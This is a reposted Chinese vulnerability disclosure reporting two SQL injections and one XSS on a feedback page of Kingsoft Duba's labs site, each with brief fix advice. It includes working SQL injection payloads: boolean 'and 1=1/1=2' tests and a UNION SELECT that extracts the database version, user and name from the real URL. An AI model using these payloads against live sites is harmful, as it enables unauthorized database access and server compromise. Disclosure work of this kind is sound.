金山毒霸多个sql注入及XSS漏洞和修复

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  第一个

  简要描述由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

  详细说明http://labs.duba./kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

  漏洞证明http://labs.duba./kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

  http://labs.duba./kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

  结果明显不同 注入漏洞产生

  修复方案过滤变量app

  第二个

  简要描述过滤不严导致存在SQL注入

  详细说明过滤不严导致存在SQL注入 有机会拿下服务器权限

  漏洞证明http://labs.duba./kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

  http://labs.duba./robots.txt

  未作进一步测试

  修复方案过滤参数

  第三个

  简要描述留言处过滤不严 造成跨站漏洞

  详细说明留言处过滤不严 造成跨站漏洞

  漏洞证明http://labs.duba./kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by